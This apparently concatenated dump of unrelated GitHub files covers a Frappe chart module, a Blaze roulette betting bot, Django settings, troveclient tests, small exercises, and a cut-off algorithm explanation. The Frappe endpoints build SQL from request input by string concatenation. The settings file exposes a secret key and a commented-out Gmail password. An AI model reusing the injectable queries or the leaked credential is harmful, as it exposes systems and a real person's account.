from('\n\tfor key in dbname:\n\t\ttemp =key['site_name']\n\t\tqry=\"SELECT subject,creation,'%s' as site_name FROM \"%(temp)\n\t\tif temp :\n\t\t\tqry+=temp+'.tabFeed'\n\t\t\tlst.append(qry)\n\tfin_qry=' UNION '.join(lst)\n\tqry=qry_srt+fin_qry+\" where doc_name='Administrator')foo ORDER BY creation DESC limit 5\"\n\tact_details=frappe.db.sql(fin_qry,as_dict=1,debug=1)\n\treturn act_details\n\n\n@frappe.whitelist()\ndef get_data_newsale(from_date=None,to_date=None):\n\tif from_date and to_date:\n\t\tstr1=\"select date_format(creation,'%M') as month,count(*) as lead from `tabLead` where date(creation) between '\"+formated_date(from_date)+\"' and '\"+formated_date(to_date)+\"' order by month\"\n\t\tsales_details=frappe.db.sql(str1,debug=1)\n\t\treturn{\n\t\t\"order_total\": sales_details\n\t }\n\telse:\n\t\tstr1=\"select date_format(creation,'%M') as month,count(*) as lead from `tabLead` order by month\"\n\t\tsales_details=frappe.db.sql(str1,debug=1)\n\t\treturn{\n\t\t\"order_total\": sales_details\n\t }\n\n@frappe.whitelist()\ndef get_prospect(from_date=None,to_date=None):\n\tfrappe.errprint(\"in the pro py\")\n\tfrappe.errprint(from_date)\n\tfrappe.errprint(to_date)\n\n\tif from_date and to_date:\n\t\tstr2=\"select name,sum(target_amount*percentage_allocation/100)as target_amount from (SELECT sp.name,bd.fiscal_year,bdd.month,bdd.percentage_allocation,(select sum(td.target_amount) from `tabTarget Detail` td where td.parent=sp.name and td.fiscal_year=bd.fiscal_year) as target_amount,(case when bdd.month in('January','February','March') then SUBSTRING_INDEX(SUBSTRING_INDEX(bd.fiscal_year, '-', 1), ' ', -1) else SUBSTRING_INDEX(SUBSTRING_INDEX(bd.fiscal_year, '-', -1), ' ', -1) end) as year FROM `tabSales Person` sp,`tabBudget Distribution` bd,`tabBudget Distribution Detail` bdd where sp.distribution_id=bd.name and bdd.parent=bd.name )foo where date_format(str_to_date(concat('01-',month,'-',year),'%d-%M-%Y'),'%y-%m') between date_format(date('\"+formated_date(from_date)+\"'),'%y-%m') and date_format(date('\"+formated_date(to_date)+\"'),'%y-%m') group by name\"\n\t\tfrappe.errprint(str2)\n\t\tprospect_details=frappe.db.sql(str2,debug=1)\n\t\tfrappe.errprint(prospect_details)\n\t\treturn{\n\t\t\"order_total\": prospect_details\n\t }\n\telse:\n\t\tstr1=\"select date_format(creation,'%M') as month,count(*) as lead from `tabLead` order by 
month\"\n\t\tsales_details=frappe.db.sql(str1,debug=1)\n\t\treturn{\n\t\t\"order_total\": sales_details\n\t }\t \n\n\n@frappe.whitelist()\ndef get_subscription(from_date=None,to_date=None):\n\tfrappe.errprint(\"in the get_subscription py\")\n\t#frappe.errprint(from_date)\n\t#frappe.errprint(to_date)\n\t#frappe.errprint(\"calling \")\n\tif from_date and to_date:\n\t\tstr2=\"select name,EXTRACT(month FROM expiry_date) as expiry_date from `tabSite Master` where expiry_date between '2013-12-25' and '2015-12-25'\"\n\t\t#frappe.errprint(str2)\n\t\tsubscription_details=frappe.db.sql(str2,as_list=1)\n\t\tfrappe.errprint(subscription_details)\n\t\treturn{\n\t\t\"order_total\": subscription_details\n\t }\n\telse:\n\t\tstr2=\"select name,EXTRACT(month FROM expiry_date) as expiry_date from `tabSite Master` where expiry_date is not null\"\n\t\t#frappe.errprint(str2)\n\t\tsubscription_details=frappe.db.sql(str2,as_list=1)\n\t\tfrappe.errprint(subscription_details)\n\t\treturn{\n\t\t\"order_total\": subscription_details\n\t }\n\n\t\t \n\n","repo_name":"rohitw1991/smarttailorfrappe","sub_path":"frappe/core/page/graphical_chart/graphical_chart.py","file_name":"graphical_chart.py","file_ext":"py","file_size_in_byte":5339,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"13377575425","text":"import time\r\nimport json\r\nfrom datetime import datetime\r\nimport requests\r\n\r\n\r\ndef get_blaze_data(url, save_file=True):\r\n r = requests.get(url)\r\n\r\n if save_file:\r\n save_data_to_file(r.text)\r\n return json.loads(r.text)\r\n\r\n# função que faz a requisição para o horário atual\r\n\r\n\r\ndef make_request(start_date=\"2023-04-23\", end_date=\"2023-04-24\", save_file=True):\r\n cur_hour = get_current_time_hour()\r\n print(cur_hour)\r\n url = f\"https://blaze.com/api/roulette_games/history?startDate={start_date}T{cur_hour}.000Z&endDate={end_date}T{cur_hour}.000Z&page=1\"\r\n\r\n r = requests.get(url)\r\n if save_file:\r\n save_data_to_file(r.text)\r\n return json.loads(r.text)\r\n\r\n\r\ndef save_data_to_file(data):\r\n with open(\"result.json\", \"w\") as f:\r\n f.write(data)\r\n\r\n\r\ndef get_current_time_hour():\r\n now = datetime.now()\r\n current_time = now.strftime(\"%H:%M:%S\")\r\n return current_time\r\n\r\n\r\ndef get_total_pages(data):\r\n return data[\"totalPages\"]\r\n\r\n\r\ndef get_only_result_data(data):\r\n result = []\r\n for i, v in enumerate(data[\"records\"]):\r\n val = v[\"color\"]\r\n if i < 5:\r\n result.append(val)\r\n return result\r\n\r\n\r\ndef estrategia(result_array):\r\n color_count = 0\r\n last = None\r\n print(result_array)\r\n for color in result_array:\r\n if last == None:\r\n last = color\r\n if color == last:\r\n color_count += 1\r\n else:\r\n return color_count\r\n return color_count\r\n\r\n\r\nif __name__ == \"__main__\":\r\n while True:\r\n data = make_request()\r\n result = get_only_result_data(data)\r\n r_est = estrategia(result)\r\n if r_est == 5:\r\n print(\"5 seguidos da mesma cor. Entrada válida!\")\r\n if result[0] == \"red\":\r\n print(\"Aposta: black\")\r\n else:\r\n print(\"Aposta: red\")\r\n elif r_est == 3:\r\n print(\"3 seguidos. 
Aposta próxima!\")\r\n if result[0] == \"red\":\r\n print(\"Aposta: black\")\r\n else:\r\n print(\"Aposta: red\")\r\n time.sleep(27)\r\n","repo_name":"Eduard0MS/boot","sub_path":"teste.py","file_name":"teste.py","file_ext":"py","file_size_in_byte":2107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"9815856627","text":"import csv \r\nfrom Coleccion import Coleccion\r\nfrom EContratado import EContratado\r\n \r\nif __name__=='__main__':\r\n \r\n cant=int(input(\"ingrese la cantidad de empleados a registrar \"))\r\n \r\n ManejaEmpleados=Coleccion(cant)\r\n ManejaEmpleados.cargaEmpleados()\r\n \r\n print(\"1. Registrar Horas\")\r\n print(\"2. Total de Tareas\")\r\n print(\"3. Ayuda Economica\")\r\n print(\"4. Calcular Sueldo\")\r\n \r\n op=int(input(\"ingrese la opcion a realizar: \"))\r\n \r\n while op != 0:\r\n if op == 1:\r\n dni=int(input(\"ingrese dni del empleado \"))\r\n horas=int(input(\"ingrese la cantidad de horas trabajadas: \"))\r\n empleado=ManejaEmpleados.buscaDNI()\r\n if empleado != False and isinstance(empleado,EContratado):\r\n empleado.incrementoHoras(horas) \r\n elif op == 2:\r\n tarea=input(\"ingrese la tarea a buscar: \")\r\n fecha=input(\"ingrese fecha actual: \")\r\n EmpleadoExterno=ManejaEmpleados.buscaTarea(tarea)\r\n confirmacion=ManejaEmpleados.verificaFecha(fecha,EmpleadoExterno)\r\n if EmpleadoExterno != False and confirmacion ==True:\r\n EmpleadoExterno.montoPagar()\r\n elif op == 3:\r\n ManejaEmpleados.ayudaSolidaria()\r\n elif op == 4:\r\n ManejaEmpleados.mostrarSueldo()\r\n else:\r\n print(\"opcion incorrecta. \")\r\n \r\n print(\"1. Registrar Horas\")\r\n print(\"2. Total de Tareas\")\r\n print(\"3. Ayuda Economica\")\r\n print(\"4. Calcular Sueldo\") \r\n \r\n op=int(input(\"ingrese la opcion a realizar: \"))\r\n \r\n \r\n ","repo_name":"Ignacio43/Ejercicio-4.U3","sub_path":"Ejercicio 4.U3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1686,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"37577350577","text":"# -*- coding: utf-8 -*-\n\"\"\"\nDjango settings for frikr project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.6/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.6/ref/settings/\n\"\"\"\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os\nBASE_DIR = os.path.dirname(os.path.dirname(__file__))\n\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = 'wd9c_x9m4tz3w$l^m6$+wo+mfr&u*!em&@7)jjy&4e8=)qg^6m'\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\nTEMPLATE_DEBUG = True\n\nALLOWED_HOSTS = []\n\n\n# Application definition\n\nINSTALLED_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'photos',\n 'rest_framework'\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 
'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n\nROOT_URLCONF = 'frikr.urls'\n\nWSGI_APPLICATION = 'frikr.wsgi.application'\n\n\n# Database\n# https://docs.djangoproject.com/en/1.6/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),\n }\n}\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.6/topics/i18n/\n\nLANGUAGE_CODE = 'es-es'\n\nTIME_ZONE = 'UTC'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.6/howto/static-files/\n\nSTATIC_URL = '/static/'\n\nLOGIN_URL = '/login'\n\n# REST Framework settings\nREST_FRAMEWORK = {\n 'PAGINATE_BY': 3, #indica los elemantos a mostrar por página\n 'PAGINATE_BY_PARAM': 'page_size', # permite definir al cliente el tamaño de paginación\n 'MAX_PAGINATE_BY': 10, # máximo número de items por página permitidos\n 'DEFAULT_RENDERER_CLASSES': (\n 'rest_framework.renderers.JSONRenderer',\n 'rest_framework.renderers.XMLRenderer',\n 'rest_framework.renderers.BrowsableAPIRenderer',\n #'rest_framework.renderers.YAMLRenderer',\n )\n}\n\n\n# Configuración de archivos media\nMEDIA_ROOT = os.path.join(BASE_DIR, 'media')\nMEDIA_URL = '/media/'\n\n\n# Configuración para depurar e-mail\n# python -m smtpd -n -c DebuggingServer localhost:1025\nEMAIL_HOST = '127.0.0.1'\nEMAIL_PORT = 1025\n\n# EMAIL_USE_TLS = True\n# EMAIL_HOST = 'smtp.gmail.com'\n# EMAIL_HOST_USER = 'antonio.jimenez2@gmail.com'\n# EMAIL_HOST_PASSWORD = 'No@violence13cig3cx6h'\n# EMAIL_PORT = 587\n","repo_name":"antjimar/Friker","sub_path":"frikr/frikr/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":2992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"10242353439","text":"N,M=map(int,input().split())\nc=[[False]*(N+1) for _ in range(N+1)]\n\nfor i in range(M):\n u,m=map(int,input().split())\n c[u][m]=True\n c[m][u]=True\n \nans=0 \nfor i in range(1,N+1):\n for j in range(i+1,N+1):\n for k in range(j+1,N+1):\n if c[i][j] and c[j][k] and c[k][i]:\n ans+=1\n \nprint(ans)\n","repo_name":"gomatofu/atcoder","sub_path":"submissions/abc262/b.py","file_name":"b.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"1706579864","text":"\"\"\"\nClass Fitness to treat the fitness as the inverse of the route distance. 
We want to minimize route distance, so a larger\nfitness score is better.\n\"\"\"\n\n\nclass Fitness:\n def __init__(self, route):\n self.route = route\n self.distance = 0\n self.fitness = 0.0\n\n def route_distance(self):\n if self.distance == 0:\n path_distance = 0\n for i in range(0, len(self.route)):\n from_city = self.route[i]\n if (i + 1) < len(self.route):\n to_city = self.route[i + 1]\n else:\n to_city = self.route[0]\n path_distance += from_city.distance(to_city)\n self.distance = path_distance\n return self.distance\n\n def route_fitness(self):\n if self.fitness == 0:\n self.fitness = 1 / float(self.route_distance())\n return self.fitness\n","repo_name":"NamizataS/Biomimetics_TPs","sub_path":"TP3/Fitness.py","file_name":"Fitness.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"72611770671","text":"import contextlib\nimport os\nfrom unittest import mock\n\nimport testtools\n\nfrom troveclient.apiclient import exceptions\nfrom troveclient import base\nfrom troveclient import common\nfrom troveclient import utils\n\n\"\"\"\nUnit tests for base.py\n\"\"\"\n\nUUID = '8e8ec658-c7b0-4243-bdf8-6f7f2952c0d0'\n\n\ndef obj_class(self, res, loaded=True):\n return res\n\n\nclass BaseTest(testtools.TestCase):\n def test_getid(self):\n obj = \"test\"\n r = base.getid(obj)\n self.assertEqual(obj, r)\n\n test_id = \"test_id\"\n obj = mock.Mock()\n obj.id = test_id\n r = base.getid(obj)\n self.assertEqual(test_id, r)\n\n\nclass ManagerTest(testtools.TestCase):\n def setUp(self):\n super(ManagerTest, self).setUp()\n self.orig__init = base.Manager.__init__\n base.Manager.__init__ = mock.Mock(return_value=None)\n self.orig_os_makedirs = os.makedirs\n\n def tearDown(self):\n super(ManagerTest, self).tearDown()\n base.Manager.__init__ = self.orig__init\n os.makedirs = self.orig_os_makedirs\n\n def test___init__(self):\n api = mock.Mock()\n base.Manager.__init__ = self.orig__init\n manager = base.Manager(api)\n self.assertEqual(api, manager.api)\n\n def test_completion_cache(self):\n manager = base.Manager()\n\n # handling exceptions\n mode = \"w\"\n cache_type = \"unittest\"\n obj_class = mock.Mock\n with manager.completion_cache(cache_type, obj_class, mode):\n pass\n\n os.makedirs = mock.Mock(side_effect=OSError)\n with manager.completion_cache(cache_type, obj_class, mode):\n pass\n\n def test_write_to_completion_cache(self):\n manager = base.Manager()\n\n # no cache object, nothing should happen\n manager.write_to_completion_cache(\"non-exist\", \"val\")\n manager._mock_cache = mock.Mock()\n manager._mock_cache.write = mock.Mock(return_value=None)\n manager.write_to_completion_cache(\"mock\", \"val\")\n self.assertEqual(1, manager._mock_cache.write.call_count)\n\n def _get_mock(self):\n manager = base.Manager()\n manager.api = mock.Mock()\n manager.api.client = mock.Mock()\n\n def side_effect_func(self, body, loaded=True):\n return body\n\n manager.resource_class = mock.Mock(side_effect=side_effect_func)\n return manager\n\n def test__get_with_response_key_none(self):\n manager = self._get_mock()\n url_ = \"test-url\"\n body_ = \"test-body\"\n resp_ = \"test-resp\"\n manager.api.client.get = mock.Mock(return_value=(resp_, body_))\n r = manager._get(url=url_, response_key=None)\n self.assertEqual(body_, r)\n\n def test__get_with_response_key(self):\n manager = self._get_mock()\n response_key = \"response_key\"\n body_ = {response_key: \"test-resp-key-body\"}\n url_ = \"test_url_get\"\n 
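# (added) the stub stands in for the real client, which returns a (response, body)\n        # pair; _get is expected to ignore the response and unwrap body[response_key]\n        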
manager.api.client.get = mock.Mock(return_value=(url_, body_))\n r = manager._get(url=url_, response_key=response_key)\n self.assertEqual(body_[response_key], r)\n\n def test__create(self):\n manager = base.Manager()\n manager.api = mock.Mock()\n manager.api.client = mock.Mock()\n\n response_key = \"response_key\"\n data_ = \"test-data\"\n body_ = {response_key: data_}\n url_ = \"test_url_post\"\n manager.api.client.post = mock.Mock(return_value=(url_, body_))\n\n return_raw = True\n r = manager._create(url_, body_, response_key, return_raw)\n self.assertEqual(data_, r)\n\n return_raw = False\n\n @contextlib.contextmanager\n def completion_cache_mock(*arg, **kwargs):\n yield\n\n mockl = mock.Mock()\n mockl.side_effect = completion_cache_mock\n manager.completion_cache = mockl\n\n manager.resource_class = mock.Mock(return_value=\"test-class\")\n r = manager._create(url_, body_, response_key, return_raw)\n self.assertEqual(\"test-class\", r)\n\n def get_mock_mng_api_client(self):\n manager = base.Manager()\n manager.api = mock.Mock()\n manager.api.client = mock.Mock()\n return manager\n\n def test__delete(self):\n resp_ = \"test-resp\"\n body_ = \"test-body\"\n\n manager = self.get_mock_mng_api_client()\n manager.api.client.delete = mock.Mock(return_value=(resp_, body_))\n # _delete just calls api.client.delete, and does nothing\n # the correctness should be tested in api class\n manager._delete(\"test-url\")\n pass\n\n def test__update(self):\n resp_ = \"test-resp\"\n body_ = \"test-body\"\n\n manager = self.get_mock_mng_api_client()\n manager.api.client.put = mock.Mock(return_value=(resp_, body_))\n body = manager._update(\"test-url\", body_)\n self.assertEqual(body_, body)\n\n\nclass ManagerListTest(ManagerTest):\n def setUp(self):\n super(ManagerListTest, self).setUp()\n\n @contextlib.contextmanager\n def completion_cache_mock(*arg, **kwargs):\n yield\n\n self.manager = base.Manager()\n self.manager.api = mock.Mock()\n self.manager.api.client = mock.Mock()\n\n self.response_key = \"response_key\"\n self.data_p = [\"p1\", \"p2\"]\n self.body_p = {self.response_key: self.data_p}\n self.url_p = \"test_url_post\"\n self.manager.api.client.post = mock.Mock(\n return_value=(self.url_p, self.body_p)\n )\n self.data_g = [\"g1\", \"g2\", \"g3\"]\n self.body_g = {self.response_key: self.data_g}\n self.url_g = \"test_url_get\"\n self.manager.api.client.get = mock.Mock(\n return_value=(self.url_g, self.body_g)\n )\n\n mockl = mock.Mock()\n mockl.side_effect = completion_cache_mock\n self.manager.completion_cache = mockl\n\n def tearDown(self):\n super(ManagerListTest, self).tearDown()\n\n def test_list_with_body_none(self):\n body = None\n li = self.manager._list(\"url\", self.response_key, obj_class, body)\n self.assertEqual(len(self.data_g), len(li))\n for i in range(0, len(li)):\n self.assertEqual(self.data_g[i], li[i])\n\n def test_list_body_not_none(self):\n body = \"something\"\n li = self.manager._list(\"url\", self.response_key, obj_class, body)\n self.assertEqual(len(self.data_p), len(li))\n for i in range(0, len(li)):\n self.assertEqual(self.data_p[i], li[i])\n\n def test_list_key_mapping(self):\n data_ = {\"values\": [\"p1\", \"p2\"]}\n body_ = {self.response_key: data_}\n url_ = \"test_url_post\"\n self.manager.api.client.post = mock.Mock(return_value=(url_, body_))\n li = self.manager._list(\"url\", self.response_key,\n obj_class, \"something\")\n data = data_[\"values\"]\n self.assertEqual(len(data), len(li))\n for i in range(0, len(li)):\n self.assertEqual(data[i], li[i])\n\n def 
test_list_without_key_mapping(self):\n data_ = {\"v1\": \"1\", \"v2\": \"2\"}\n body_ = {self.response_key: data_}\n url_ = \"test_url_post\"\n self.manager.api.client.post = mock.Mock(return_value=(url_, body_))\n li = self.manager._list(\"url\", self.response_key,\n obj_class, \"something\")\n self.assertEqual(len(data_), len(li))\n\n\nclass MangerPaginationTests(ManagerTest):\n\n def setUp(self):\n super(MangerPaginationTests, self).setUp()\n self.manager = base.Manager()\n self.manager.api = mock.Mock()\n self.manager.api.client = mock.Mock()\n self.manager.resource_class = base.Resource\n\n self.response_key = \"response_key\"\n self.data = [{\"foo\": \"p1\"}, {\"foo\": \"p2\"}]\n self.next_data = [{\"foo\": \"p3\"}, {\"foo\": \"p4\"}]\n self.marker = 'test-marker'\n self.limit = '20'\n self.url = \"http://test_url\"\n self.next_url = '%s?marker=%s&limit=%s' % (self.url, self.marker,\n self.limit)\n self.links = [{'href': self.next_url, 'rel': 'next'}]\n self.body = {\n self.response_key: self.data,\n 'links': self.links\n }\n self.next_body = {self.response_key: self.next_data}\n\n def side_effect(url):\n if url == self.url:\n return None, self.body\n # In python 3 the order in the dictionary is not constant\n # between runs. So we cant rely on the URL params to be\n # in the same order\n if ('marker=%s' % self.marker in url and\n 'limit=%s' % self.limit in url):\n self.next_url = url\n return None, self.next_body\n\n self.manager.api.client.get = mock.Mock(side_effect=side_effect)\n\n def tearDown(self):\n super(MangerPaginationTests, self).tearDown()\n\n def test_pagination(self):\n resp = self.manager._paginated(self.url, self.response_key)\n self.manager.api.client.get.assert_called_with(self.url)\n self.assertEqual('p1', resp[0].foo)\n self.assertEqual('p2', resp[1].foo)\n self.assertEqual(self.marker, resp.next)\n self.assertEqual(self.links, resp.links)\n self.assertIsInstance(resp, common.Paginated)\n\n def test_pagination_next(self):\n resp = self.manager._paginated(self.url, self.response_key,\n limit=self.limit, marker=self.marker)\n self.manager.api.client.get.assert_called_with(self.next_url)\n self.assertEqual('p3', resp[0].foo)\n self.assertEqual('p4', resp[1].foo)\n self.assertIsNone(resp.next)\n self.assertEqual([], resp.links)\n self.assertIsInstance(resp, common.Paginated)\n\n def test_pagination_error(self):\n self.manager.api.client.get = mock.Mock(return_value=(None, None))\n self.assertRaises(Exception, self.manager._paginated,\n self.url, self.response_key)\n\n\nclass FakeResource(object):\n def __init__(self, _id, properties):\n self.id = _id\n try:\n self.name = properties['name']\n except KeyError:\n pass\n try:\n self.display_name = properties['display_name']\n except KeyError:\n pass\n\n\nclass FakeManager(base.ManagerWithFind):\n resource_class = FakeResource\n\n resources = [\n FakeResource('1234', {'name': 'entity_one'}),\n FakeResource(UUID, {'name': 'entity_two'}),\n FakeResource('4242', {'display_name': 'entity_three'}),\n FakeResource('5678', {'name': '9876'})\n ]\n\n def get(self, resource_id):\n for resource in self.resources:\n if resource.id == str(resource_id):\n return resource\n raise exceptions.NotFound(resource_id)\n\n def list(self):\n return self.resources\n\n\nclass FindResourceTestCase(testtools.TestCase):\n def setUp(self):\n super(FindResourceTestCase, self).setUp()\n self.manager = FakeManager(None)\n\n def test_find_none(self):\n self.assertRaises(exceptions.CommandError,\n utils.find_resource,\n self.manager,\n 'asdf')\n\n def 
test_find_by_integer_id(self):\n output = utils.find_resource(self.manager, 1234)\n self.assertEqual(self.manager.get('1234'), output)\n\n def test_find_by_str_id(self):\n output = utils.find_resource(self.manager, '1234')\n self.assertEqual(self.manager.get('1234'), output)\n\n def test_find_by_uuid(self):\n output = utils.find_resource(self.manager, UUID)\n self.assertEqual(self.manager.get(UUID), output)\n\n def test_find_by_str_name(self):\n output = utils.find_resource(self.manager, 'entity_one')\n self.assertEqual(self.manager.get('1234'), output)\n\n def test_find_by_str_displayname(self):\n output = utils.find_resource(self.manager, 'entity_three')\n self.assertEqual(self.manager.get('4242'), output)\n\n def test_find_by_int_name(self):\n output = utils.find_resource(self.manager, 9876)\n self.assertEqual(self.manager.get('5678'), output)\n\n\nclass ResourceTest(testtools.TestCase):\n def setUp(self):\n super(ResourceTest, self).setUp()\n self.orig___init__ = base.Resource.__init__\n\n def tearDown(self):\n super(ResourceTest, self).tearDown()\n base.Resource.__init__ = self.orig___init__\n\n def test___init__(self):\n manager = mock.Mock()\n manager.write_to_completion_cache = mock.Mock(return_value=None)\n\n info_ = {}\n robj = base.Resource(manager, info_)\n self.assertEqual(0, manager.write_to_completion_cache.call_count)\n\n info_ = {\"id\": \"id-with-less-than-36-char\"}\n robj = base.Resource(manager, info_)\n self.assertEqual(info_[\"id\"], robj.id)\n self.assertEqual(0, manager.write_to_completion_cache.call_count)\n\n id_ = \"id-with-36-char-\"\n for i in range(36 - len(id_)):\n id_ = id_ + \"-\"\n info_ = {\"id\": id_}\n robj = base.Resource(manager, info_)\n self.assertEqual(info_[\"id\"], robj.id)\n self.assertEqual(1, manager.write_to_completion_cache.call_count)\n\n info_[\"name\"] = \"test-human-id\"\n # Resource.HUMAN_ID is False\n robj = base.Resource(manager, info_)\n self.assertEqual(info_[\"id\"], robj.id)\n self.assertIsNone(robj.human_id)\n self.assertEqual(2, manager.write_to_completion_cache.call_count)\n\n # base.Resource.HUMAN_ID = True\n info_[\"HUMAN_ID\"] = True\n robj = base.Resource(manager, info_)\n self.assertEqual(info_[\"id\"], robj.id)\n self.assertEqual(info_[\"name\"], robj.human_id)\n self.assertEqual(4, manager.write_to_completion_cache.call_count)\n\n def test_human_id(self):\n manager = mock.Mock()\n manager.write_to_completion_cache = mock.Mock(return_value=None)\n\n info_ = {\"name\": \"test-human-id\"}\n robj = base.Resource(manager, info_)\n self.assertIsNone(robj.human_id)\n\n info_[\"HUMAN_ID\"] = True\n robj = base.Resource(manager, info_)\n self.assertEqual(info_[\"name\"], robj.human_id)\n robj.name = \"new-human-id\"\n self.assertEqual(\"new-human-id\", robj.human_id)\n\n def get_mock_resource_obj(self):\n base.Resource.__init__ = mock.Mock(return_value=None)\n robj = base.Resource()\n robj._loaded = False\n return robj\n\n def test__add_details(self):\n robj = self.get_mock_resource_obj()\n info_ = {\"name\": \"test-human-id\", \"test_attr\": 5}\n robj._add_details(info_)\n self.assertEqual(info_[\"name\"], robj.name)\n self.assertEqual(info_[\"test_attr\"], robj.test_attr)\n\n def test___getattr__(self):\n robj = self.get_mock_resource_obj()\n info_ = {\"name\": \"test-human-id\", \"test_attr\": 5}\n robj._add_details(info_)\n self.assertEqual(info_[\"test_attr\"], robj.__getattr__(\"test_attr\"))\n\n # TODO(dmakogon): looks like causing infinite recursive calls\n # robj.__getattr__(\"test_non_exist_attr\")\n\n def 
test___repr__(self):\n robj = self.get_mock_resource_obj()\n info_ = {\"name\": \"test-human-id\", \"test_attr\": 5}\n robj._add_details(info_)\n\n expected = \"\"\n self.assertEqual(expected, robj.__repr__())\n\n def test_get(self):\n robj = self.get_mock_resource_obj()\n manager = mock.Mock()\n manager.get = None\n\n robj.manager = object()\n robj._get()\n\n manager = mock.Mock()\n robj.manager = mock.Mock()\n\n robj.id = \"id\"\n new = mock.Mock()\n new._info = {\"name\": \"test-human-id\", \"test_attr\": 5}\n robj.manager.get = mock.Mock(return_value=new)\n robj._get()\n self.assertEqual(\"test-human-id\", robj.name)\n self.assertEqual(5, robj.test_attr)\n\n def test___eq__(self):\n robj = self.get_mock_resource_obj()\n other = base.Resource()\n\n info_ = {\"name\": \"test-human-id\", \"test_attr\": 5}\n robj._info = info_\n other._info = {}\n self.assertFalse(robj.__eq__(other))\n\n robj.id = \"rid\"\n other.id = \"oid\"\n self.assertFalse(robj.__eq__(other))\n\n other.id = \"rid\"\n self.assertTrue(robj.__eq__(other))\n\n # not instance of the same class\n other = mock.Mock()\n self.assertEqual(robj.__eq__(other), NotImplemented)\n\n def test_is_loaded(self):\n robj = self.get_mock_resource_obj()\n robj._loaded = True\n self.assertTrue(robj.is_loaded)\n\n robj._loaded = False\n self.assertFalse(robj.is_loaded)\n","repo_name":"openstack/python-troveclient","sub_path":"troveclient/tests/test_base.py","file_name":"test_base.py","file_ext":"py","file_size_in_byte":16696,"program_lang":"python","lang":"en","doc_type":"code","stars":71,"dataset":"github-code","pt":"38"} +{"seq_id":"32918461565","text":"#!/usr/bin/env python3\r\n\r\nimport argparse\r\nimport json\r\n\r\nfrom changes import MixtapeChanges\r\nfrom mixtapes import NaiveMixtape, OptimizedMixtape\r\n\r\n\r\ndef get_args():\r\n parser = argparse.ArgumentParser('Apply some changes')\r\n parser.add_argument('-i', '--input', dest='input_file', required=True, help='Input filename')\r\n parser.add_argument('-o', '--changes', dest='changes_file', required=True, help='Changes filename')\r\n return parser.parse_args()\r\n\r\n\r\ndef load_files(arguments):\r\n in_file = json.load(open(arguments.input_file))\r\n change_file = json.load(open(arguments.changes_file))\r\n return in_file, change_file\r\n\r\n\r\nif __name__ == '__main__':\r\n args = get_args()\r\n input_file, changes_file = load_files(args)\r\n\r\n mixtape = NaiveMixtape(input_file)\r\n mixtape_changes = MixtapeChanges(changes_file)\r\n\r\n mixtape.apply(mixtape_changes)\r\n output = json.dumps(mixtape.mixtape, indent=4)\r\n print(output)\r\n","repo_name":"KenAdamson/highspot-test","sub_path":"apply.py","file_name":"apply.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"30737934273","text":"\"\"\"\nKth smallest element in a row-wise and column-wise sorted 2D array\n\nGiven an n*n matrix where every row and column is sorted in non-decreasing order. \nFind the kth smallest element in the given 2D array.\n\nExample, \n\nInput:k = 3 and array =\n 10, 20, 30, 40\n 15, 25, 35, 45\n 24, 29, 37, 48\n 32, 33, 39, 50 \nOutput: 20\nExplanation: The 3rd smallest element is 20 \n\nInput:k = 7 and array =\n 10, 20, 30, 40\n 15, 25, 35, 45\n 24, 29, 37, 48\n 32, 33, 39, 50 \nOutput: 30\n\nApproach:\n\nThe idea is to find the kth minimum element. Each row and each column is sorted. 
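(Worked illustration added by the editor, hand-traced on the k = 3 example above: seed a min-heap with the first row 10, 20, 30, 40; pop 10 and push 15 from the same column; pop 15 and push 24; the third pop yields 20, the expected output.)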
So it can be\nthought of as n sorted lists that have to be merged into a single list, where the kth\nelement of the merged list is the answer. So the approach is an ordinary k-way merge; the only difference is that\nthe loop ends as soon as the kth element has been extracted.\n\nAlgorithm:\n1. Use min heap - create min-heap to store the elements\n2. Traverse the first row from start to end and build a min heap of elements from first row.\nA heap entry also stores row number and column number\n3. Now run a loop k times to extract min element from heap in each iteration\n4. Get minimum element or root from Min-Heap.\n5. Find row number and column number of the minimum element.\n6. Replace root with next element from same column and min-heapify the root.\n7. Print the last extracted element, which is the kth minimum element.\n\n\nTime Complexity:\n\nThe solution involves the following steps:\nBuilding a min-heap, which takes O(n) time.\nHeapifying k times, which takes O(k log n) time.\n\nSpace Complexity:\nO(R), where R is the length of a row, as the Min-Heap stores one row at a time.\nThis code can be optimized to build a heap of size k when k is smaller than n; in that case,\nthe kth smallest 